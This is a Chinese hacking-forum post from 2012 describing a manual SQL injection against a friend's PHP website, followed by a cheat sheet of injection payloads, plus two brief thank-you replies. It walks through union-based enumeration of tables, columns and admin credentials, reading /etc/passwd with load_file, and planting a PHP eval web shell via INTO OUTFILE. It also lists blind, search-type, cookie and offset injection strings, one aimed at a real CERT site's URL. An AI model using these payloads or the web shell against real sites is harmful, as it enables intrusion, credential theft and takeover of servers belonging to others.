找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3495|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
: J1 r& R7 b4 `& P6 S  M让我看看,既然人家开口了,我也不好拒绝,那就看看吧?* c. \* l% \" {- b
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。" R4 Z' {- S7 f9 Y+ `" T3 J
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)% u. `& b# c( ]! u  B
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
: x, P$ o0 X& E; N6 n) `* b这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
9 L5 b5 U' Q0 F! u3 z, ZWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
. P& l5 w! }; }+ @6 E/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
6 v* m) I* p6 p2 ~                        
6 `# C1 Q: p6 K/ H/ p8 c# \2 [* T2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
( e& ]6 X7 I1 E) H1 i3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
8 `* R2 X& {/ K8 X6 U' s3 e4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
( n+ w7 i( x9 \& }( t4 T3 R5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。* g0 P7 D2 x, w' w+ m6 d
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
- P5 q6 o1 d1 N2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。3 s8 X0 A  T6 n: O& N1 @
我就用的是第二个思路,
  Q+ q5 S, K% K+ F' b0 D提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  9 m7 g( s1 D/ T. a7 Y7 s' z0 G$ A
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
+ @* x8 @+ r  X2 I& i; [提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--! n, F, V  f4 F% s* K
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
, w7 N: i! x4 {! O( L8 n3 \) F, ^7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
7 R2 p+ |' _3 Z9 @) K/ m! m是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....* w% N3 J, C) M* c. {# R* }- c
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
: g  A& m% f8 ]/ E! V& Y然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,& v% N; m6 T- S' T# |# \4 I
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......) t- w2 F0 a; G. u6 ^2 }
下面是一些很普遍注入方式资料:9 u1 g4 w. n4 h& P
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='( ~) T' K8 I8 \5 x) _4 h# z* E
拆半法
1 W& {  q/ g) X+ {######################################1 P/ E. Z/ C8 i- l
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
) O* z5 c3 f9 t* H3 Z0 B6 L8 Aand exists (select * from admin)
$ C9 `$ C+ u  k0 d. P6 E. Zand exists(select id from admin)  G$ l$ h7 \/ _1 N/ i9 O  n: ~- A: G
and exists(select id from admin where id=1)( s! X: \5 b. d; I
and exists(select id from admin where id>1) / `+ E( v6 N! B7 {7 w
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
& F& l$ K% [% H- rand exists (select username from admin)
. w/ U3 \; q* h7 o& A9 _; U( @and exists (select password from admin)+ s& y7 B) J7 x/ |4 Y: K$ l* h, |
and exists (select id from admin where len(username)<10 and id=1). b* y3 f& ?" L7 m# D% w
and exists (select id from admin where len(username)>5 and id=1)) Y6 m! j! _5 Q- L) A
and exists (select id from admin where len(username)=6 and id=1)
" C, L* X- W" K1 uand exists (select id from admin where len(password)<10 and id=1)
1 }5 ^$ d% A- F6 Q3 v0 ~2 B" p. Land exists (select id from admin where len(password)>5 and id=1)
- B4 f) S# R' @+ j1 r) z4 ]and exists (select id from admin where len(password)=7 and id=1)
2 f  z# g. R0 j3 {- W  H2 D" jand (select top 1 asc(mid(username,1,1)) from admin)=97$ Y! F* K$ K" m! i; J
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
! R. t2 _  o( z2 _+ b3 r猜第二位把username,1,1改成username,2,1就可以了。6 ~: ?& z9 e* @/ V7 ]/ m, a
猜密码把username改成password就OK了5 b5 }1 G: `& k
##################################################
/ D1 _5 g. t2 G9 @. P4 |& Y搜索型注入
* R8 l: N  s, F& m# D##################################
# N, A/ s8 F- t! Z; {/ w%' and 1=1 and '%'='5 _' W$ d# h( g! |9 U% q5 z# N
%' and exists (select * from admin) and '%'='+ B3 @# Y0 i. N
%' and exists(select id from admin where id=1) and '%'='
1 s7 g# ^; y& I' H' N1 W  A( D%' and exists (select id from admin where len(username)<10 and id=1) and '%'='; d: ~2 T4 r# \8 `" Y
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
! p  B: [  o" K  J/ \0 d# X%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='$ B" O" k% u: S* p0 l) M
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='$ ?- O* [# G: F4 [/ r
对于MSSQL数据库,后面可以吧 and '%'='换成--; g+ ?2 C" d# o9 K9 |8 B
还有一点搜索型注入也可以使用union语句。5 X4 k( \+ A! k$ l+ J
########################################################
' I* `! a% I" @* q+ y8 ?联合查询。
; n8 O. P" a( [2 @0 ^#####################################
8 ?+ m& \; c2 n/ f8 f; Z) r0 p/ [order by 107 v7 J% r# x' e3 Y: z6 C. C6 }; o
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
6 Y" K2 Q* {5 v! T/ `$ p* `$ t, Gand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin; I- z/ c( o- N% q3 {$ }( W
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
2 |$ O' r$ {5 P1 g# P很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)2 |1 f0 ]% d7 V, m: S/ z3 V
###################################
9 }5 C! i$ B5 t8 r2 {cookie注入
* W( ^+ V' L5 F###############################
6 {" M. s/ w! r: O9 nhttp://www.******.com/shownews.asp?id=127
- g" Q$ f5 [6 {5 O7 U4 b2 }http://www.******.com/shownews.asp
, c3 W3 l0 F. ]* }2 s' `% ^alert(="id="+escape("127"));3 [" s/ Q- t9 T4 Z0 `
alert(="id="+escape("127 and 1=1"));9 G2 {8 y; r& y, {
alert(="id="+escape("127 order by 10"));6 F( y1 T9 a7 E
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
( T' n! n$ F+ R' V- Oalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
! ^0 c$ I! s9 a& W, ~# F; [1 u这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。9 i0 a* o( y  D7 `$ o
###################################
4 H, A# N* [7 a  K/ b偏移注入8 r" B9 s3 i+ W8 }1 {2 z. a5 C
###########################################################
% f. d2 I" `7 Q4 c, t4 O* v0 Munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
2 F- i7 v" c5 Z' B4 Q9 wunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
( g+ q4 e' v9 v8 V6 ]9 W; B" l3 hunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
# A7 W) U" g. L1 Runion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)) k& D' c$ d6 _7 k
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
3 Q3 Q: R( X: T2 |; l! ^union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)$ ?9 J8 v: c+ {! w2 X
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on" N- [9 N8 F; S( q  z
a.id=d.id)3 f5 ~/ w8 m1 e& p- l. [
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)+ K, ?' k1 g9 R- M0 E( r& G
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
9 @- C- H! M1 V! H: c0 k% [5 L9 h1 s  
$ t' G7 g7 w$ Q- A0 t5 m; K============================================================================================================
* H# [" G" z. W: ^1 Y" i1.判断版本
/ B5 D8 i) z8 B5 uand ord(mid(version(),1,1))>51# e, ]8 l* F8 s& ]/ t
返回正常,说明大于4.0版本,支持ounion查询: u2 X$ l2 @) N( r2 [* K
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解. \$ D% }  J; g) `: O
and 2=4 union select 1,2,3,4,5,6,7,8,9--; _9 S4 v6 e8 d  G8 c  q# \
3.查看数据库版本及当前用户,5 s, j, S; s7 f6 r: D) V* Y
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--& S8 Z7 v0 c3 q. T
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,& Z% l& H+ m2 |) L/ k8 h
4.判断有没有写权限
$ `0 p# \5 h& {2 O1 @and (select count(*) from MySQL.user)>0--
$ _3 ~; O2 {# a5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
- d2 k1 e* f2 D- v7 G" R用不了这个命令,就学习土耳其黑客手法,如下1 `# p/ Q/ k) B
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
2 k5 C% F; W7 I0 l, t( O: y4 S1 g6.爆表,爆库! c. J5 O8 t7 ]3 |! ~5 U
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
/ m2 }* `9 v; v2 \5 t6 }7.爆列名,爆表9 c8 p6 y) ^+ }4 ]5 R' W0 y6 ~
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--6 e8 s# q9 u! e3 U6 g& H/ ?
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。9 b. l" |6 {9 i$ {, V- f$ ~5 e
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
% _& g' N: s* J5 B" P6 P  \9.爆字段内容
  C* u$ S. V" Eand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--. V7 n! b. X' Q
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表